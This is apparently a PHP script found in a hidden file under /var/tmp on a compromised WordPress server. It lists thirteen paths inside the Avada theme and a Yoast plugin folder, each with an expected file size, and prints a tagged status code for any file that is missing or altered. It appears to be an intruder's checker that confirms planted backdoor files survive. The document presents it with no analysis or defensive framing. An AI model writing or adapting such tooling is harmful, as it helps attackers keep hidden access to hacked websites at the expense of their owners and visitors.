File: //var/tmp/.parameter_group
<?php $r = '/home/corofmbe/public_html'; $x = ["/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/color_rgba/field.color.rgba.php"=>"bd@@1335340@@939",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/section/field.section.php"=>"bd@@1335347@@862",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/color_rgba/validation.color.rgba.php"=>"bd@@1335350@@982",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/colorrgba/validation.colorrgba.php"=>"bd@@1290552@@851",
"/wp-content/plugins/fusion-builder-disabled/inc/lib/inc/redux/framework/FusionReduxCore/inc/fields/sorter/field.sorter.php"=>"bd@@1335354@@970",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/slides/field.slides.php"=>"bd@@1293371@@1043",
"/wp-content/plugins/fusion-builder-disabled/inc/lib/inc/redux/framework/FusionReduxCore/inc/fields/color/field.color.php"=>"bd@@1335366@@878",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/color_gradient/field.color.gradient.php"=>"bd@@1290413@@968",
"/wp-content/themes/Avada/woocommerce/compatibility/3.2/single-product/tabs/additional.information.php"=>"bd@@1290694@@1016",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/raw/parsedown.raw.php"=>"bd@@1290467@@894",
"/wp-content/themes/Avada/includes/lib/inc/redux/custom-fields/color_alpha/field.color.alpha.php"=>"bd@@1293541@@813",
"/wp-content/plugins/wordpress-seo/vendor/ruckusing/ruckusing-migrations/lib/Task/Hello/ThreeWay.php"=>"bd@@1293559@@915",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/no_html/validation.no.html.php"=>"bd@@1290510@@939"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');